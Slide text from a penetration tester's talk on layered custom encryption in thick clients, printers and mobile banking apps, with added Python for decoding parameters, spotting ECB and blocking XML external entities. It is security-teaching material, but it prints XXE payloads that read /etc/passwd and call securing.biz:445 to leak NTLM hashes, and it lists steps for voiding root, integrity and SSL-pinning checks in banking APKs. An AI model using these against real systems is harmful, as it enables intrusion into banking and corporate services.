When it comes to thick clients, Java applets, embedded devices or mobile apps, the idea is often to forget about the HTTP/S stack and plaintext POST parameters and instead implement a custom communication protocol.
- Sending files for printing? A Caesar cipher does not support full UTF-8, so use AES in ECB mode.
- Malware attacking online banking? Even over HTTPS, double-encrypt the POST parameters. If your clients are rich, use asymmetric encryption, for better protection.
- Planning a SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection.
Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography: ideas that usually amount to 'security by obscurity'. Once the outer layer of obfuscation is off, the server backend very often reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from tests of enterprise solutions which required a bit more effort before data sent from the client could be tampered with:
- intercepting the traffic, bypassing NAC
- decapsulating encryption and encoding layers
- hooking into function calls, modifying packages
- reverse-engineering proprietary protocols and encryption.
3. JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling, DevSecOps, penetration tests
• Poland, Spain, Australia
• banking, fintech, law, airline, entertainment, e-commerce
• Speaker at BlackHat, HackInTheBox, ZeroNights
Who
4. What is this all about?
[Diagram: client -> server HTTP request with body username=admin&password=abc, carried inside SSL; the only observation point is Wireshark on the wire.]
6. What is this all about?
[Diagram: the same request, but the parameter names and values are now base64-encoded:
dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d
which decodes back to username=admin&password=abc. Observation points: local HTTP proxy, custom script, Wireshark.]
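The "custom script" in the diagram above is usually nothing more than a small decoder that strips the encoding layers one at a time until readable parameters fall out. The following Python is an added example, not code from the talk: the body string is the one on the slide, while the decoder heuristics (URL encoding, hex, base64, each accepted only when the result is printable text) and the function names are my own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote

# Constructed input: the base64-wrapped login request shown on the slide.
SAMPLE_BODY = "dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d"

_HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _readable(raw: bytes) -> bool:
    """A decoding step only counts if it yields printable UTF-8 text."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def _decode_once(token: str):
    """Try to remove one layer: URL encoding, then hex, then base64.
    Hypothetical helper with my own heuristics; returns (layer, decoded)
    or (None, token) when nothing applies."""
    unquoted = unquote(token)
    if unquoted != token:
        return "url", unquoted
    candidates = []
    if len(token) >= 4 and _HEX_RE.match(token):
        candidates.append(("hex", bytes.fromhex))
    if len(token) % 4 == 0 and _B64_RE.match(token):
        candidates.append(("base64", lambda t: base64.b64decode(t, validate=True)))
    for name, decoder in candidates:
        try:
            raw = decoder(token)
        except (ValueError, binascii.Error):
            continue
        if _readable(raw):
            return name, raw.decode("utf-8")
    return None, token


def peel(token: str, max_depth: int = 5):
    """Strip nested encoding layers from one token.
    Returns (plaintext, [layer names, outermost first])."""
    layers, current = [], token
    for _ in range(max_depth):
        name, decoded = _decode_once(current)
        if name is None:
            break
        layers.append(name)
        current = decoded
    return current, layers


def decode_body(body: str) -> dict:
    """Decode every key and value of a form-encoded body.
    Returns {key: (value, key_layers, value_layers)}. The slide's sample
    values carry a trailing newline inside the base64, which is stripped.
    Note: parse_qsl turns a literal '+' into a space, so raw base64 in a
    form body must arrive with '+' percent-encoded."""
    result = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        k, k_layers = peel(key)
        v, v_layers = peel(value)
        result[k.strip()] = (v.strip(), k_layers, v_layers)
    return result


if __name__ == "__main__":
    for key, (value, k_layers, v_layers) in decode_body(SAMPLE_BODY).items():
        print(f"{key}={value}  (key via {k_layers}, value via {v_layers})")
```

The readability check is what keeps the decoder honest: a token that happens to look like hex or base64 is only treated as a layer if the decoded bytes are text, so binary blobs (real ciphertext) stop the loop instead of being mangled.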
16. • JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1
19. In the middle of printers - revisited
[Diagram: SERVER <-> PRINTER exchange as seen on the wire:
HELLO - constant 263 B
HELLO, CERTIFICATE - 96 B, “X” B, 128 B
SESSION KEY - always different, 64 B
PostScript, ECB mode - many identical 16 B blocks]
20. ECB encryption mode for PostScript files
Each block encrypted separately
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode
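The "many identical 16 B blocks" observation on the previous slide can be turned into a mechanical check over captured data: ECB maps equal plaintext blocks to equal ciphertext blocks, so counting repeated blocks in a capture tells you whether a supposedly encrypted stream leaks structure. The following Python is an added example, not code from the talk. Its block-cipher stub is a keyed hash standing in for one AES block operation so the script runs on a plain Python install; the PostScript job, key and IV are constructed. The `repeated_block_stats` check itself applies unchanged to real AES-ECB output.

```python
import hashlib
import hmac
from collections import Counter

BLOCK = 16  # AES block size in bytes


def pad(data: bytes, block: int = BLOCK) -> bytes:
    """PKCS#7 padding so the message is a whole number of blocks."""
    n = block - (len(data) % block)
    return data + bytes([n]) * n


def block_cipher_stub(key: bytes, block: bytes) -> bytes:
    """Hypothetical stand-in for a single AES block encryption: deterministic
    and key-dependent, 16 bytes in, 16 bytes out. NOT a real cipher; it only
    reproduces the property that matters here (same input, same output)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """ECB: every block is encrypted independently, so equal plaintext
    blocks give equal ciphertext blocks."""
    pt = pad(plaintext)
    return b"".join(block_cipher_stub(key, pt[i:i + BLOCK])
                    for i in range(0, len(pt), BLOCK))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC: each block is XORed with the previous ciphertext block before
    encryption, which removes the repetition."""
    pt = pad(plaintext)
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        mixed = bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev))
        prev = block_cipher_stub(key, mixed)
        out.append(prev)
    return b"".join(out)


def repeated_block_stats(data: bytes, block: int = BLOCK):
    """Return (total_blocks, repeated_blocks); repeated_blocks counts every
    occurrence of a block value beyond its first."""
    usable = len(data) - len(data) % block
    counts = Counter(data[i:i + block] for i in range(0, usable, block))
    return usable // block, sum(c - 1 for c in counts.values())


def looks_like_ecb(data: bytes, block: int = BLOCK, min_ratio: float = 0.05) -> bool:
    """Heuristic for eyeballing captures: a noticeable share of repeated
    blocks means ECB (or no encryption at all)."""
    total, repeated = repeated_block_stats(data, block)
    return total > 0 and repeated / total >= min_ratio


# Constructed sample: a small PostScript job with 512 bytes of uniform (0xff)
# image data, the kind of content that produces identical plaintext blocks.
SAMPLE_PS = (
    b"%!PS-Adobe-3.0\n"
    b"%%Title: ecb-demo.ps\n"
    + b"\xff" * 512
    + b"showpage\n"
)
KEY = b"constructed-demo-key"
IV = bytes(range(16))

if __name__ == "__main__":
    for name, ct in (("ECB", ecb_encrypt(KEY, SAMPLE_PS)),
                     ("CBC", cbc_encrypt(KEY, IV, SAMPLE_PS))):
        total, repeated = repeated_block_stats(ct)
        print(f"{name}: {repeated}/{total} repeated blocks, "
              f"looks_like_ecb={looks_like_ecb(ct)}")
```

Running it shows 30 of 35 ciphertext blocks repeated under ECB and none under CBC, for the same plaintext and key. The 5% threshold is deliberately low: genuinely random-looking ciphertext of a few hundred blocks should show no repeated 16-byte blocks at all.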
50. Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2
51. Attack flow – inception level 2
[Diagram: Threat actor -> Set the proxy -> Bypass hardcoded SSL pinning checks -> Tamper with parameters -> Crown jewels]
52. • Decompile APK to Smali code
• „Void” the pinning methods or change the certificate:
• Find the interesting methods
• Delete the code, leaving „return-void” at the end
• Build it, sign it
Attack flow – inception level 2
53. Testing mobile banking in late 2010s, Poland
[Diagram: pairing exchange between the mobile app and the bank, protected by SSL pinning and HTTP body encryption:
app -> bank: "Hi, I want to pair a mobile app"
bank -> app: "OK, let's set a key for future encryption"
Encrypted bodies shown on the slide: 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436]
55. Testing mobile banking in late 2010s, Poland
[Diagram: the same pairing exchange, now behind the full set of client-side layers: SSL pinning, encrypted storage, APK/IPA integrity, emulator detection, root/jailbreak detection, HTTP body encryption.
app -> bank: "Hi, I want to pair a mobile app"
bank -> app: "OK, let's set a key for future encryption"
Encrypted bodies shown on the slide: 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436]
56. Attack flow – Android – 7 layers of inception
[Diagram: Threat actor -> ... -> Crown jewels. Layers as labelled on the diagram: bypass integrity checks, bypass root detection, make encryption static, bypass SSL pinning, bypass emulator detection, develop Burp plugin, tamper with parameters]
57. • Decompile APK to Smali code
• „Void” the integrity checks
Attack flow – Android – inception level 1/7
58. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• Second root check runs a minute after the first!
Attack flow – Android – inception level 2/7
59. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
Attack flow – Android – inception level 3/7
60. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
Attack flow – Android – inception level 4/7
61. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Attack flow – Android – inception level 5/7
62. Example 4 – mobile banking in 2019, Poland
[Diagram: pairing exchange behind SSL pinning, encrypted storage, APK/IPA integrity, emulator detection, root/jailbreak detection and HTTP body encryption.
app -> bank: "Hi, I want to pair a mobile app"
bank -> app: "OK, let's set a key for future encryption"
Encrypted bodies shown on the slide: 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436]
63. Example 4 – mobile banking in 2019, Poland
[Diagram: the same exchange after the encryption key has been made static; the same layers are drawn (SSL pinning, encrypted storage, APK/IPA integrity, emulator detection, root/jailbreak detection, HTTP body encryption).
app -> bank: "Hi, I want to pair a mobile app"
bank -> app: "The key will be 0000000000"
Encrypted bodies shown on the slide: 1c45a9eef01775077dac93add52595, e81129f01a5072bad84aaaf8bcc51436]
64. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7
70. Attack flow – tnSOAP
[Diagram: Threat actor -> Intercept TCP connection (hardware + socat) -> MiTM on START-TLS (mitm_relay) -> Decapsulate WCF (python-wcfbin + a few fixes) -> Tamper with parameters -> Crown jewels]
71. • <!ENTITY xxe SYSTEM "file:///etc/passwd">
• XXE OOB over FTP
• <!ENTITY abc SYSTEM "file://securing.biz:445/">
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
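From the defender's side, this chain ends at the XML step if the parser behind the WCF decapsulation simply refuses external entities. The following Python is an added example, not code from the talk or from WCF: a pre-parse gate built on the standard-library expat binding that rejects any DOCTYPE by default and, when a DTD has to be tolerated, still rejects external DTD references and external entity declarations before the document reaches the real parser. The SOAP envelope sample is constructed; the two XXE samples wrap the entity declarations quoted on the slide above. The .NET equivalent of the strict default is `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit`.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares something an XXE payload relies on."""


def check_external_entities(xml_bytes: bytes, allow_dtd: bool = False) -> bool:
    """Scan the document with expat without resolving anything, and fail as
    soon as it declares an external DTD or an external entity. With the
    strict default (allow_dtd=False) any DOCTYPE at all is rejected."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXML(f"DOCTYPE not allowed (root element {name!r})")
        if sysid is not None or pubid is not None:
            raise UnsafeXML(f"external DTD reference: {sysid!r}")

    def on_entity_decl(name, is_parameter, value, base, sysid, pubid, notation):
        # An entity with a SYSTEM/PUBLIC identifier is an external entity,
        # which is exactly what the file:// payloads on the slide use.
        if sysid is not None or pubid is not None:
            raise UnsafeXML(f"external entity {name!r} -> {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Exceptions raised inside expat handlers abort the parse and propagate.
    parser.Parse(xml_bytes, True)
    return True


def is_safe(xml_bytes: bytes, allow_dtd: bool = False) -> bool:
    """Boolean form of the check; malformed XML counts as unsafe too."""
    try:
        return check_external_entities(xml_bytes, allow_dtd)
    except (UnsafeXML, xml.parsers.expat.ExpatError):
        return False


def parse_untrusted(xml_bytes: bytes, allow_dtd: bool = False):
    """Gate first, then hand the bytes to the application parser."""
    check_external_entities(xml_bytes, allow_dtd)
    return ET.fromstring(xml_bytes)


# Constructed samples; the two XXE ones use the entity declarations from the slide.
SOAP_OK = (b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
           b'<s:Body><Ping/></s:Body></s:Envelope>')
XXE_FILE = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
XXE_OOB = b'<!DOCTYPE foo [<!ENTITY abc SYSTEM "file://securing.biz:445/">]><foo>&abc;</foo>'
INTERNAL_ONLY = b'<!DOCTYPE foo [<!ENTITY greet "hello">]><foo>&greet;</foo>'
EXTERNAL_DTD = b'<!DOCTYPE foo SYSTEM "http://dtd.example.invalid/foo.dtd"><foo/>'

if __name__ == "__main__":
    for label, doc in (("soap", SOAP_OK), ("xxe-file", XXE_FILE), ("xxe-oob", XXE_OOB),
                       ("internal-entity", INTERNAL_ONLY), ("external-dtd", EXTERNAL_DTD)):
        print(f"{label:16} strict={is_safe(doc)!s:5} allow_dtd={is_safe(doc, True)}")
```

The gate runs before any network or file access can happen because expat only calls the declaration handlers; nothing in this code registers an external entity resolver. Keep `allow_dtd=False` unless the protocol genuinely needs internal entities, since that is the one setting that also shuts out DTD-based entity expansion tricks the example does not try to detect.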
72. Attack flow – tnSOAP
[Diagram: Threat actor -> Intercept TCP connection (hardware + socat) -> MiTM on START-TLS (mitm_relay) -> Decapsulate WCF (python-wcfbin + a few fixes) -> Tamper with parameters -> Increased attack surface]
73. • Not a surprise that there are vulnerabilities
• Let’s talk about corporate processes:
• How are penetration tests organised?
• During which phase do you realise it’s an inception app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Processes
74. Attack flow – Android – inception level 7/7
[Diagram: Threat actor -> ... -> Crown jewels. Layers as labelled on the diagram: bypass integrity checks, bypass root detection, make encryption static, bypass SSL pinning, bypass emulator detection, develop Burp plugin, tamper with parameters. Caption: You are in position to start testing.]
75. • Not a surprise that there are vulnerabilities
• Let’s talk about corporate processes:
• How are penetration tests organised?
• During which phase do you realise it’s an inception app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary